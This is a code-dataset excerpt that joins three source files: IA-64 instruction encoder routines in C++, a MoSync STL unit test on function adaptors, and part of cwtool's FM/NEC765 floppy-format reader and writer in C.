void Merced_Encoder::ipf_fcvt_fx(FFix_Convert fc, Float_Status_Field sf, unsigned dest, unsigned src, unsigned pred)
{
encode( // 4.6.7.1
opc_enc.F8_F9_F10_F11_F12_F13(0, 0, (0x18+fc), sf),
0,
reg_enc.F2_F1(src, dest),
pred
);
}
// Emit fixed-to-float conversion (manual 4.6.7.2); x6 is fixed at 0x1C.
void Merced_Encoder::ipf_fcvt_xf(unsigned dest, unsigned src, unsigned pred)
{
encode( // 4.6.7.2
opc_enc.F8_F9_F10_F11_F12_F13(0, 0, 0x1C, 0),
0,
reg_enc.F2_F1(src, dest),
pred
);
}
// Emit a floating-point load (manual 4.4.1.6).
// The fill form has the fixed x6 0x1B; all other forms pack flag (bits 5:2)
// and size (bits 1:0) as the integer loads do.
void Merced_Encoder::ipf_ldf(Float_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned pred)
{
    unsigned x6 = (flag == mem_ld_fill) ? 0x1B : (flag << 2) + size;
    encode( // 4.4.1.6
        opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(6, x6, hint, 0, 0),
        0,
        reg_enc.R3_R1(addrreg, dest),
        pred
    );
}
// Emit a floating-point load with register post-increment (manual 4.4.1.7).
// The fill form uses the fixed x6 0x1B.
void Merced_Encoder::ipf_ldf_inc_reg(Float_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned inc_reg, unsigned pred)
{
unsigned x6;
if (flag == mem_ld_fill)
x6 = 0x1B;
else
x6 = (flag << 2) + size;
encode( // 4.4.1.7
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(6, x6, hint, 0, 1),
0,
reg_enc.R3_R2_R1(addrreg, inc_reg, dest),
pred
);
}
// Emit a floating-point load with immediate post-increment (manual 4.4.1.8).
// The fill form uses the fixed x6 0x1B; major opcode 7.
void Merced_Encoder::ipf_ldf_inc_imm(Float_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned inc_imm, unsigned pred)
{
unsigned x6;
if (flag == mem_ld_fill)
x6 = 0x1B;
else
x6 = (flag << 2) + size;
encode( // 4.4.1.8
opc_enc.M3_M5_M8_M10_M15(7, x6, hint),
imm_enc.M3_M8_M15(inc_imm),
reg_enc.R3_R1(addrreg, dest),
pred
);
}
// Emit a floating-point store (manual 4.4.1.9).
// The spill form has the fixed x6 0x3B; other forms use the load encoding
// shifted up by 0x30.
void Merced_Encoder::ipf_stf(Float_Mem_Size size, St_Flag flag, Mem_Hint hint, unsigned addrreg, unsigned src, unsigned pred)
{
    unsigned x6 = (flag == mem_st_spill) ? 0x3B : ((flag << 2) + size) + 0x30;
    // make sure hint != 2
    encode( // 4.4.1.9
        opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(6, x6, hint, 0, 0),
        0,
        reg_enc.R3_R2(addrreg, src),
        pred
    );
}
// Emit a floating-point store with immediate post-increment (manual 4.4.1.10).
// The spill form uses the fixed x6 0x3B; major opcode 7.
void Merced_Encoder::ipf_stf_inc_imm(Float_Mem_Size size, St_Flag flag, Mem_Hint hint, unsigned addrreg, unsigned src, unsigned inc_imm, unsigned pred)
{
unsigned x6;
if (flag == mem_st_spill)
x6 = 0x3B;
else
x6 = ((flag << 2) + size) + 0x30;
// make sure hint != 2
encode( // 4.4.1.10
opc_enc.M3_M5_M8_M10_M15(7, x6, hint),
imm_enc.M5_M10(inc_imm),
reg_enc.R3_R2(addrreg, src),
pred
);
}
// Emit alloc, the register-stack frame allocation (manual 4.4.9.1, M34).
// i/l/o are the input, local and output region sizes; r is the rotating
// region size. Note this instruction is not predicated.
void Merced_Encoder::ipf_alloc(unsigned dest, unsigned i, unsigned l, unsigned o, unsigned r)
{
encode( // 4.4.9.1
opc_enc.M20_M21_M22_M23_M34(1, 6),
imm_enc.M34(i+l, o, r), // sol = i + l
reg_enc.R1(dest)
);
}
// Emit a move to branch register (format I21, manual 4.3.6.1).
// 'ret' sets the return-form bit; the tag is encoded relative to the
// current instruction pointer.
void Merced_Encoder::ipf_mtbr(unsigned bdest, unsigned src, Branch_Predict_Whether_Hint wh, bool ret, unsigned offset, unsigned pred)
{
    unsigned ip_now = _offset;
    unsigned ret_bit = ret ? 1 : 0;
    unsigned imp_hint = 0;          // importance hint; value not significant here
    unsigned tag = ip_now + offset; // 13-bit tag, IP-relative
    encode( // 4.3.6.1
        opc_enc.I21(0, 7, imp_hint, ret_bit, wh, 0, 0),
        imm_enc.I21(tag, ip_now),
        reg_enc.R2_B1(src, bdest),
        pred
    );
}
// Emit a move from branch register to general register (manual 4.3.6.2,
// format I22, x6 = 0x31).
void Merced_Encoder::ipf_mfbr(unsigned dest, unsigned bsrc, unsigned pred)
{
encode( // 4.3.6.2
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, 0x31),
0,
reg_enc.B2_R1(bsrc, dest),
pred
);
}
// Emit a move to an application register (mov ar = r).
// Application registers are split between the M-unit and the I-unit:
// most go through the M-unit form (opcode 1, manual 4.4.7.1), while
// pfs/lc/ec use the I-unit form (opcode 0, manual 4.3.8.1). Both forms
// share x6 = 0x2a. Unknown registers abort via assert.
void Merced_Encoder::ipf_mtap(EM_Application_Register adest, unsigned src, unsigned pred)
{
unsigned opcode = 0, x6 = 0;
switch (adest)
{
case AR_kr0:
case AR_kr1:
case AR_kr2:
case AR_kr3:
case AR_kr4:
case AR_kr5:
case AR_kr6:
case AR_kr7:
case AR_rsc:
case AR_bsp:
case AR_bspstore:
case AR_rnat:
case AR_fcr:
case AR_eflag:
case AR_csd:
case AR_ssd:
case AR_cflg:
case AR_fsr:
case AR_fir:
case AR_fdr:
case AR_ccv:
case AR_unat:
case AR_fpsr:
case AR_itc:
// M template
opcode = 1;
x6 = 0x2a;
break;
case AR_pfs:
case AR_lc:
case AR_ec:
// I template
opcode = 0;
x6 = 0x2a;
break;
default:
assert(0); // application register not handled
}
encode( // 4.3.8.1 and 4.4.7.1
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(opcode, 0, x6),
0,
reg_enc.R3_R2(adest, src),
pred
);
}
// Emit a move from an application register (mov r = ar).
// Mirrors ipf_mtap: M-unit form (opcode 1, x6 0x22, manual 4.4.7.3) for
// most registers, I-unit form (opcode 0, x6 0x32, manual 4.3.8.3) for
// pfs/lc/ec. Unknown registers abort via assert.
void Merced_Encoder::ipf_mfap(unsigned dest, EM_Application_Register asrc, unsigned pred)
{
unsigned opcode = 0, x6 = 0;
switch (asrc)
{
case AR_kr0:
case AR_kr1:
case AR_kr2:
case AR_kr3:
case AR_kr4:
case AR_kr5:
case AR_kr6:
case AR_kr7:
case AR_rsc:
case AR_bsp:
case AR_bspstore:
case AR_rnat:
case AR_fcr:
case AR_eflag:
case AR_csd:
case AR_ssd:
case AR_cflg:
case AR_fsr:
case AR_fir:
case AR_fdr:
case AR_ccv:
case AR_unat:
case AR_fpsr:
case AR_itc:
// M template
opcode = 1;
x6 = 0x22;
break;
case AR_pfs:
case AR_lc:
case AR_ec:
// I template
opcode = 0;
x6 = 0x32;
break;
default:
assert(0); // application register not handled
}
encode( // 4.3.8.3 and 4.4.7.3
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(opcode, 0, x6),
0,
reg_enc.R3_R1(asrc, dest),
pred
);
}
// Emit a move from the instruction pointer into a general register
// (manual 4.3.7.3, x6 = 0x30).
void Merced_Encoder::ipf_movip(unsigned dest, unsigned pred)
{
encode( // 4.3.7.3
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, 0x30),
0,
reg_enc.R1(dest),
pred
);
}
// Emit xma, the fixed-point multiply-add executed on the FP unit
// (format F2, manual 4.6.1.1): dest = src1 * src2 + src3.
// opcode and x are fixed; the flag selects the low/high/unsigned variant
// via the x2 field.
void Merced_Encoder::ipf_xma(unsigned dest, unsigned src1, unsigned src2, unsigned src3, Xla_Flag flag, unsigned pred)
{
    const unsigned opcode = 0xE;
    const unsigned x = 1;
    unsigned x2 = flag;
    encode( // 4.6.1.1
        opc_enc.F1_F2_F3(opcode, x, x2),
        0,
        reg_enc.F4_F3_F2_F1(src2, src1, src3, dest),
        pred
    );
}
// Emit cmpxchg, the atomic compare-and-exchange (manual 4.4.1.1 variant
// with the m bit set). x6 packs the cmpxchg flag and access size.
void Merced_Encoder::ipf_cmpxchg(Int_Mem_Size size, Cmpxchg_Flag flag, Mem_Hint hint, unsigned dest, unsigned r3, unsigned r2, unsigned pred)
{
unsigned x6 = (flag << 2) + size;
encode( // 4.4.1.1
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(4, x6, hint, 1, 0),
0,
reg_enc.R3_R2_R1(r3, r2, dest),
pred
);
}
// Emit a move to predicate registers under a 17-bit mask (format I23,
// manual 4.3.6.1).
void Merced_Encoder::ipf_mtpr(unsigned src1, unsigned mask17, unsigned pred)
{
encode( // 4.3.6.1
opc_enc.I20_I23_I24_M20_M21(0, 3),
imm_enc.I23(mask17),
reg_enc.R2(src1),
pred
);
}
// Emit a move to the rotating predicate registers from a 28-bit immediate
// (format I24, manual 4.3.6.2).
void Merced_Encoder::ipf_mtpr_rot(unsigned imm28, unsigned pred)
{
encode( // 4.3.6.2
opc_enc.I20_I23_I24_M20_M21(0, 2),
imm_enc.I24(imm28),
0,
pred);
}
// Emit a move from the predicate registers into a general register
// (format I25, manual 4.3.6.3, x6 = 0x33).
void Merced_Encoder::ipf_mfpr(unsigned dest, unsigned pred)
{
encode( // 4.3.6.3
opc_enc.I25(0, 0, 0x33),
0,
reg_enc.R1(dest),
pred);
}
// Emit cover, which allocates a new empty register-stack frame
// (format B8, manual 4.5.3.1). Not predicated.
void Merced_Encoder::ipf_cover()
{
encode( // 4.5.3.1
opc_enc.B8_B9(0, 2),
0,
0,
0);
} //Merced_Encoder::ipf_cover
// Emit flushrs, which flushes the register stack to the backing store
// (manual 4.4.6.2). Not predicated.
void Merced_Encoder::ipf_flushrs()
{
encode( // 4.4.6.2
//unsigned M24_M25_M26_M37(unsigned opcode, unsigned x3, unsigned x4, unsigned x2);
opc_enc.M24_M25_M26_M37(0, 0, 0xc, 0),
0,
0,
0);
} //Merced_Encoder::ipf_flushrs
// Emit mf, the memory fence (format M24).
void Merced_Encoder::ipf_mf(unsigned pred) {
encode( // M24
opc_enc.M24_M25_M26_M27_M37(0, 0, 2, 2),
0,
0,
pred);
}
| gpl-2.0 |
MoSync/MoSync | testPrograms/unitTestSTL/Algorithms/FunctionPointerAdaptors.cpp | 2 | 3555 | /* Copyright 2013 David Axmark
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
/**
* @file FunctionPointerAdaptors.cpp
* @author Gabriela Rata
*/
#include <functional>
#include "../TestSTL.h"
#include "../Employee.h"
/**
* STL function adaptors make assumptions about the functors they use.
* See AboutFunctors.cpp for what is a functor and Adaptors.cpp on what is an adaptor.
* Adaptors.cpp describes also the adaptors provided by STL.
 * The function adapters need to know the argument type and the return type of the operator().
 * So, an STL function adaptor requires that the supplied functor object provides
 * the following public type definitions:
 * 		- for unary functors:
 * 				argument_type -> for the argument type of the operator().
 * 				result_type -> for the return type of the operator().
 * 		- for binary functors:
 * 				first_argument_type -> for the first argument type of operator()
 * 				second_argument_type -> for the second argument type of operator()
 * 				result_type -> for the return type of the operator().
* STL provides two templates that have these type definitions: unary_function
* and binary_function.
* The definitions are simple:
*
* template<class ArgumentType, class ResultType>
* struct unary_function
* {
* typedef ArgumentType argument_type;
* typedef ResultType result_type;
* };
*
* template<class FirstArgumentType, class SecondArgumentType, class ResultType>
* struct binary_function
* {
* typedef FirstArgumentType first_argument_type;
* typedef SecondArgumentType second_argument_type;
* typedef ResultType result_type;
* }
*
* All the STL functors provide the type definitions required by functor adapters.
* If we want to use our own functors, with the STL functor adaptors, we can derive
* from unary_function/binary_function. They are provided so that the user doesn't
* have to manually write these typedefs.
*
* unary_function and binary_function are defined <functional> header.
*/
// A plain comparison functor WITHOUT the typedefs required by STL function
// adaptors — used below to show that std::bind1st rejects it.
struct MyFirstFunctor
{
bool operator()(const Employee &lv, const Employee &rv)
{
return lv.getName() < rv.getName();
}
};
// The same comparison functor, but deriving from std::binary_function so it
// inherits the first_argument_type/second_argument_type/result_type typedefs
// that STL function adaptors require.
struct MySecondFunctor : public std::binary_function<Employee, Employee, bool>
{
bool operator()(const Employee &lv, const Employee &rv)
{
return lv.getName() < rv.getName();
}
};
// Demonstrates which functors can be used with the STL function adaptors:
// STL-provided functors and functors deriving from binary_function work;
// a bare hand-written functor does not.
void TestSTL::example_function_pointer_adapters()
{
/**
* using an STL functor (std::less) with an STL functor adaptor (bind1st).
* Always works because the STL functors provide the right typedefs.
*/
std::bind1st(std::less<int>(), 101); //ok
/**
* using an STL functor adapter (bind1st) with a non standard functor (MyFirstFunctor).
* Doesn't work because "MyFirstFunctor" doesn't provide the typedefs that
* STL functor adaptors need.
*/
//std::bind1st(MyFirstFunctor(), Employee(10, "Bob")); //doesn't compile
/**
* using an STL functor adapter (bind1st) with a non standard functor (MySecondFunctor).
* It works because "MySecondFunctor" inherits from std::binary_function.
*/
std::bind1st(MySecondFunctor(), Employee(10, "Bob")); //compiles
}
| gpl-2.0 |
glaubitz/cw | src/cwtool/format/fm_nec765.c | 2 | 30500 | /****************************************************************************
****************************************************************************
*
* format/fm_nec765.c
*
****************************************************************************
****************************************************************************/
#include <stdio.h>
#include "fm_nec765.h"
#include "../error.h"
#include "../debug.h"
#include "../verbose.h"
#include "../global.h"
#include "../options.h"
#include "../disk.h"
#include "../fifo.h"
#include "../format.h"
#include "fm.h"
#include "range.h"
#include "bitstream.h"
#include "container.h"
#include "match_simple.h"
#include "postcomp_simple.h"
#include "histogram.h"
#include "setvalue.h"
/****************************************************************************
*
* functions for sector and track handling
*
****************************************************************************/
#define HEADER_SIZE 6
#define DATA_SIZE 16386
#define FLAG_RD_IGNORE_SECTOR_SIZE (1 << 0)
#define FLAG_RD_IGNORE_CHECKSUMS (1 << 1)
#define FLAG_RD_IGNORE_TRACK_MISMATCH (1 << 2)
#define FLAG_RD_MATCH_SIMPLE (1 << 3)
#define FLAG_RD_MATCH_SIMPLE_FIXUP (1 << 4)
#define FLAG_RD_POSTCOMP_SIMPLE (1 << 5)
#define FLAG_RW_CRC16_INIT_VALUE1_SET (1 << 0)
#define FLAG_RW_CRC16_INIT_VALUE2_SET (1 << 1)
#define FLAG_RW_CRC16_INIT_VALUE3_SET (1 << 2)
/****************************************************************************
* fm_nec765_track_number
****************************************************************************/
static cw_count_t
fm_nec765_track_number(
	struct fm_nec765		*fm_nec,
	cw_count_t			cwtool_track,
	cw_count_t			format_track,
	cw_count_t			format_side)

	{
	/* explicit track given in the track description: use it as-is */
	if ((format_track != -1) || (format_side != -1)) return (format_track);

	/* otherwise derive the track number from the cwtool track (two sides) */
	return (cwtool_track / 2);
	}
/****************************************************************************
* fm_nec765_side_number
****************************************************************************/
/* derive the side number: if no explicit format track/side is given, the
   side alternates with the cwtool track number; otherwise the explicit
   side is used */
static cw_count_t
fm_nec765_side_number(
struct fm_nec765 *fm_nec,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
if ((format_track == -1) && (format_side == -1)) return (cwtool_track % 2);
return (format_side);
}
/****************************************************************************
* fm_nec765_sector_shift
****************************************************************************/
/* look up the per-sector size shift from the pshift table */
static int
fm_nec765_sector_shift(
struct fm_nec765 *fm_nec,
int sector)
{
return (fm_get_sector_shift(fm_nec->rw.pshift, sector, GLOBAL_NR_SECTORS));
}
/****************************************************************************
* fm_nec765_sector_size
****************************************************************************/
static int
fm_nec765_sector_size(
	struct fm_nec765		*fm_nec,
	int				sector)

	{
	int				shift = fm_nec765_sector_shift(fm_nec, sector);

	/* unknown shift (-1) falls back to the smallest size, 0x80 bytes */
	return (0x80 << ((shift == -1) ? 0 : shift));
	}
/****************************************************************************
* fm_nec765_read_sector2
****************************************************************************/
/* low-level read of one sector from the FM bit stream: find the header
   sync, read the 6-byte id field, then find the data sync (normal or
   deleted mark) and read data + 2 crc bytes; finally rewind so the next
   scan starts right after the header sync. returns the result of the
   data sync search (-1 on failure, otherwise which sync matched) */
static int
fm_nec765_read_sector2(
struct fifo *ffo_l1,
struct fm_nec765 *fm_nec,
struct disk_error *dsk_err,
struct range_sector *rng_sec,
unsigned char *header,
unsigned char *data)
{
int bitofs, data_size, result;
*dsk_err = (struct disk_error) { };
if (fm_read_sync(ffo_l1, range_sector_header(rng_sec), fm_nec->rw.sync_value1, fm_nec->rw.sync_value1) == -1) return (-1);
bitofs = fifo_get_rd_bitofs(ffo_l1);
if (fm_read_bytes(ffo_l1, dsk_err, header, HEADER_SIZE) == -1) return (-1);
range_set_end(range_sector_header(rng_sec), fifo_get_rd_bitofs(ffo_l1));
/* header[2] carries the 1-based sector number; size follows from it */
data_size = fm_nec765_sector_size(fm_nec, header[2] - 1);
result = fm_read_sync(ffo_l1, range_sector_data(rng_sec), fm_nec->rw.sync_value2, fm_nec->rw.sync_value3);
if (result == -1) return (-1);
/* data plus the 2-byte crc16 */
if (fm_read_bytes(ffo_l1, dsk_err, data, data_size + 2) == -1) return (-1);
range_set_end(range_sector_data(rng_sec), fifo_get_rd_bitofs(ffo_l1));
verbose_message(GENERIC, 2, "rewinding to bit offset %d", bitofs);
fifo_set_rd_bitofs(ffo_l1, bitofs);
return (result);
}
/****************************************************************************
* fm_nec765_write_sector2
****************************************************************************/
/* low-level write of one sector: gap + sync + id field, then gap + sync +
   data field (data already includes the crc bytes). returns 1 on success,
   -1 on fifo overflow */
static int
fm_nec765_write_sector2(
struct fifo *ffo_l1,
struct fm_nec765 *fm_nec,
unsigned char *header,
unsigned char *data,
int data_size)
{
if (fm_write_fill(ffo_l1, fm_nec->wr.fill_value2, fm_nec->wr.fill_length2) == -1) return (-1);
if (fm_write_fill(ffo_l1, fm_nec->wr.fill_value3, fm_nec->wr.fill_length3) == -1) return (-1);
if (fm_write_sync(ffo_l1, fm_nec->rw.sync_value1, 1) == -1) return (-1);
if (fm_write_bytes(ffo_l1, header, HEADER_SIZE) == -1) return (-1);
if (fm_write_fill(ffo_l1, fm_nec->wr.fill_value4, fm_nec->wr.fill_length4) == -1) return (-1);
if (fm_write_fill(ffo_l1, fm_nec->wr.fill_value5, fm_nec->wr.fill_length5) == -1) return (-1);
if (fm_write_sync(ffo_l1, fm_nec->rw.sync_value2, 1) == -1) return (-1);
if (fm_write_bytes(ffo_l1, data, data_size) == -1) return (-1);
return (1);
}
/****************************************************************************
* fm_nec765_read_sector
****************************************************************************/
/* read and validate one sector: decode it with fm_nec765_read_sector2,
   range-check the sector number, verify size, crcs and track/side id
   (each check downgradeable to a warning via rd.flags), then hand the
   data to the disk layer which keeps the best copy per sector */
static int
fm_nec765_read_sector(
struct fifo *ffo_l1,
struct fm_nec765 *fm_nec,
struct container *con,
struct disk_sector *dsk_sct,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
struct disk_error dsk_err;
struct range_sector rng_sec = RANGE_SECTOR_INIT;
unsigned char header[HEADER_SIZE];
unsigned char data[DATA_SIZE];
int result, track, side, sector, data_size;
int init = fm_nec->rw.crc16_init_value2;
result = fm_nec765_read_sector2(ffo_l1, fm_nec, &dsk_err, &rng_sec, header, data);
if (result == -1) return (-1);
/* result == 1 means the deleted-data sync matched: use its crc init */
if (result == 1) init = fm_nec->rw.crc16_init_value3;
/* accept only valid sector numbers */
track = fm_nec765_track_number(fm_nec, cwtool_track, format_track, format_side);
side = fm_nec765_side_number(fm_nec, cwtool_track, format_track, format_side);
sector = header[2] - 1; /* on-disk numbering is 1-based */
if ((sector < 0) || (sector >= fm_nec->rw.sectors))
{
verbose_message(GENERIC, 1, "sector %d out of range", sector);
return (0);
}
verbose_message(GENERIC, 1, "got sector %d", sector);
/* check sector quality */
/* NOTE(review): header[3] comes straight from the disk; a corrupt value
   could make this shift very large -- the size check below catches the
   mismatch, but the shift itself is unchecked */
data_size = 1 << (header[3] + 7);
result = format_compare2("sector size: got %d, expected %d", data_size, fm_nec765_sector_size(fm_nec, sector));
if (result > 0) verbose_message(GENERIC, 2, "wrong sector size on sector %d", sector);
if (fm_nec->rd.flags & FLAG_RD_IGNORE_SECTOR_SIZE) disk_warning_add(&dsk_err, result);
else disk_error_add(&dsk_err, DISK_ERROR_FLAG_SIZE, result);
data_size = fm_nec765_sector_size(fm_nec, sector);
result = format_compare2("header crc16 checksum: got 0x%04x, expected 0x%04x", fm_read_u16_be(&header[4]), fm_crc16(fm_nec->rw.crc16_init_value1, header, 4));
result += format_compare2("data crc16 checksum: got 0x%04x, expected 0x%04x", fm_read_u16_be(&data[data_size]), fm_crc16(init, data, data_size));
if (result > 0) verbose_message(GENERIC, 2, "checksum error on sector %d", sector);
if (fm_nec->rd.flags & FLAG_RD_IGNORE_CHECKSUMS) disk_warning_add(&dsk_err, result);
else disk_error_add(&dsk_err, DISK_ERROR_FLAG_CHECKSUM, result);
result = format_compare2("track: got %d, expected %d", header[0], track);
result += format_compare2("side: got %d, expected %d", header[1], side);
if (result > 0) verbose_message(GENERIC, 2, "track or side mismatch on sector %d", sector);
if (fm_nec->rd.flags & FLAG_RD_IGNORE_TRACK_MISMATCH) disk_warning_add(&dsk_err, result);
else disk_error_add(&dsk_err, DISK_ERROR_FLAG_NUMBERING, result);
/*
* take the data if the found sector is of better quality than the
* current one
*/
range_sector_set_number(&rng_sec, sector);
if (con != NULL) container_append_range_sector(con, &rng_sec);
disk_set_sector_number(&dsk_sct[sector], sector);
disk_sector_read(&dsk_sct[sector], &dsk_err, data);
return (1);
}
/****************************************************************************
* fm_nec765_write_sector
****************************************************************************/
/* build the id field and crc-protected data field for one sector and
   write them via fm_nec765_write_sector2. note: data is always written
   with the normal-data crc init (crc16_init_value2), never the deleted
   one */
static int
fm_nec765_write_sector(
struct fifo *ffo_l1,
struct fm_nec765 *fm_nec,
struct disk_sector *dsk_sct,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
unsigned char header[HEADER_SIZE];
unsigned char data[DATA_SIZE];
int sector = disk_get_sector_number(dsk_sct);
int data_size;
verbose_message(GENERIC, 1, "writing sector %d", sector);
header[0] = fm_nec765_track_number(fm_nec, cwtool_track, format_track, format_side);
header[1] = fm_nec765_side_number(fm_nec, cwtool_track, format_track, format_side);
header[2] = sector + 1; /* on-disk numbering is 1-based */
header[3] = fm_nec765_sector_shift(fm_nec, sector);
data_size = fm_nec765_sector_size(fm_nec, sector);
fm_write_u16_be(&header[4], fm_crc16(fm_nec->rw.crc16_init_value1, header, 4));
disk_sector_write(data, dsk_sct);
/* append the crc16 behind the payload */
fm_write_u16_be(&data[data_size], fm_crc16(fm_nec->rw.crc16_init_value2, data, data_size));
return (fm_nec765_write_sector2(ffo_l1, fm_nec, header, data, data_size + 2));
}
/****************************************************************************
* fm_nec765_statistics
****************************************************************************/
/* print histogram statistics for one track; additionally show the
   simple-postcomp histogram when that option is enabled */
static int
fm_nec765_statistics(
union format *fmt,
struct fifo *ffo_l0,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
histogram_normal(
ffo_l0,
cwtool_track,
fm_nec765_track_number(&fmt->fm_nec, cwtool_track, format_track, format_side),
fm_nec765_side_number(&fmt->fm_nec, cwtool_track, format_track, format_side));
if (fmt->fm_nec.rd.flags & FLAG_RD_POSTCOMP_SIMPLE) histogram_postcomp_simple(
ffo_l0,
fmt->fm_nec.rw.bnd,
2,
cwtool_track,
fm_nec765_track_number(&fmt->fm_nec, cwtool_track, format_track, format_side),
fm_nec765_side_number(&fmt->fm_nec, cwtool_track, format_track, format_side));
return (1);
}
/****************************************************************************
* fm_nec765_read_track2
****************************************************************************/
/* decode one raw track: optional postcompensation on the level-0 stream,
   bitstream decode into a level-1 fifo, then scan it repeatedly for
   sectors until no further sync is found */
static void
fm_nec765_read_track2(
union format *fmt,
struct container *con,
struct fifo *ffo_l0,
struct fifo *ffo_l3,
struct disk_sector *dsk_sct,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
unsigned char data[GLOBAL_MAX_TRACK_SIZE];
struct fifo ffo_l1 = FIFO_INIT(data, sizeof (data));
if (fmt->fm_nec.rd.flags & FLAG_RD_POSTCOMP_SIMPLE) postcomp_simple(ffo_l0, fmt->fm_nec.rw.bnd, 2);
bitstream_read(ffo_l0, &ffo_l1, fmt->fm_nec.rw.bnd, 2);
while (fm_nec765_read_sector(&ffo_l1, &fmt->fm_nec, con, dsk_sct, cwtool_track, format_track, format_side) != -1) ;
}
/****************************************************************************
* fm_nec765_read_track
****************************************************************************/
/* read one track; when simple matching is enabled (or raw output is
   requested) the decode goes through match_simple, which calls back into
   fm_nec765_read_track2, otherwise the track is decoded directly */
static int
fm_nec765_read_track(
union format *fmt,
struct container *con,
struct fifo *ffo_l0,
struct fifo *ffo_l3,
struct disk_sector *dsk_sct,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
struct match_simple_info mat_sim_nfo =
{
.con = con,
.fmt = fmt,
.ffo_l0 = ffo_l0,
.ffo_l3 = ffo_l3,
.dsk_sct = dsk_sct,
.cwtool_track = cwtool_track,
.format_track = format_track,
.format_side = format_side,
.bnd = fmt->fm_nec.rw.bnd,
.bnd_size = 2,
.callback = fm_nec765_read_track2,
.merge_two = fmt->fm_nec.rd.flags & FLAG_RD_MATCH_SIMPLE,
.merge_all = fmt->fm_nec.rd.flags & FLAG_RD_MATCH_SIMPLE,
.fixup = fmt->fm_nec.rd.flags & FLAG_RD_MATCH_SIMPLE_FIXUP
};
if ((fmt->fm_nec.rd.flags & FLAG_RD_MATCH_SIMPLE) || (options_get_output())) match_simple(&mat_sim_nfo);
else fm_nec765_read_track2(fmt, NULL, ffo_l0, ffo_l3, dsk_sct, cwtool_track, format_track, format_side);
return (1);
}
/****************************************************************************
* fm_nec765_write_track
****************************************************************************/
/* write one track: prolog, index mark, all sectors, trailing gaps and
   epilog into a level-1 fifo, then encode it to the level-0 bitstream
   with write precompensation. returns 1 on success, 0 on overflow */
static int
fm_nec765_write_track(
union format *fmt,
struct fifo *ffo_l3,
struct disk_sector *dsk_sct,
struct fifo *ffo_l0,
unsigned char *data,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
unsigned char data_l1[GLOBAL_MAX_TRACK_SIZE];
struct fifo ffo_l1 = FIFO_INIT(data_l1, sizeof (data_l1));
int i;
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.prolog_value, fmt->fm_nec.wr.prolog_length) == -1) return (0);
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.fill_value1, fmt->fm_nec.wr.fill_length1) == -1) return (0);
/* index address mark, fixed sync word */
if (fm_write_sync(&ffo_l1, 0xf77a, 1) == -1) return (0);
for (i = 0; i < fmt->fm_nec.rw.sectors; i++) if (fm_nec765_write_sector(&ffo_l1, &fmt->fm_nec, &dsk_sct[i], cwtool_track, format_track, format_side) == -1) return (0);
/* mark the level-3 fifo as fully consumed */
fifo_set_rd_ofs(ffo_l3, fifo_get_wr_ofs(ffo_l3));
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.fill_value6, fmt->fm_nec.wr.fill_length6) == -1) return (0);
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.fill_value7, fmt->fm_nec.wr.fill_length7) == -1) return (0);
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.epilog_value, fmt->fm_nec.wr.epilog_length) == -1) return (0);
fifo_write_flush(&ffo_l1);
if (bitstream_write(&ffo_l1, ffo_l0, fmt->fm_nec.rw.bnd, fmt->fm_nec.wr.precomp, 2) == -1) return (0);
return (1);
}
/****************************************************************************
*
* functions for configuration
*
****************************************************************************/
#define MAGIC_IGNORE_SECTOR_SIZE 1
#define MAGIC_IGNORE_CHECKSUMS 2
#define MAGIC_IGNORE_TRACK_MISMATCH 3
#define MAGIC_MATCH_SIMPLE 4
#define MAGIC_MATCH_SIMPLE_FIXUP 5
#define MAGIC_POSTCOMP_SIMPLE 6
#define MAGIC_PROLOG_LENGTH 7
#define MAGIC_PROLOG_VALUE 8
#define MAGIC_EPILOG_LENGTH 9
#define MAGIC_EPILOG_VALUE 10
#define MAGIC_FILL_LENGTH1 11
#define MAGIC_FILL_VALUE1 12
#define MAGIC_FILL_LENGTH2 13
#define MAGIC_FILL_VALUE2 14
#define MAGIC_FILL_LENGTH3 15
#define MAGIC_FILL_VALUE3 16
#define MAGIC_FILL_LENGTH4 17
#define MAGIC_FILL_VALUE4 18
#define MAGIC_FILL_LENGTH5 19
#define MAGIC_FILL_VALUE5 20
#define MAGIC_FILL_LENGTH6 21
#define MAGIC_FILL_VALUE6 22
#define MAGIC_FILL_LENGTH7 23
#define MAGIC_FILL_VALUE7 24
#define MAGIC_PRECOMP 25
#define MAGIC_SECTORS 26
#define MAGIC_SYNC_VALUE1 27
#define MAGIC_SYNC_VALUE2 28
#define MAGIC_SYNC_VALUE3 29
#define MAGIC_CRC16_INIT_VALUE1 30
#define MAGIC_CRC16_INIT_VALUE2 31
#define MAGIC_CRC16_INIT_VALUE3 32
#define MAGIC_SECTOR_SIZES 33
#define MAGIC_BOUNDS_OLD 34
#define MAGIC_BOUNDS_NEW 35
/****************************************************************************
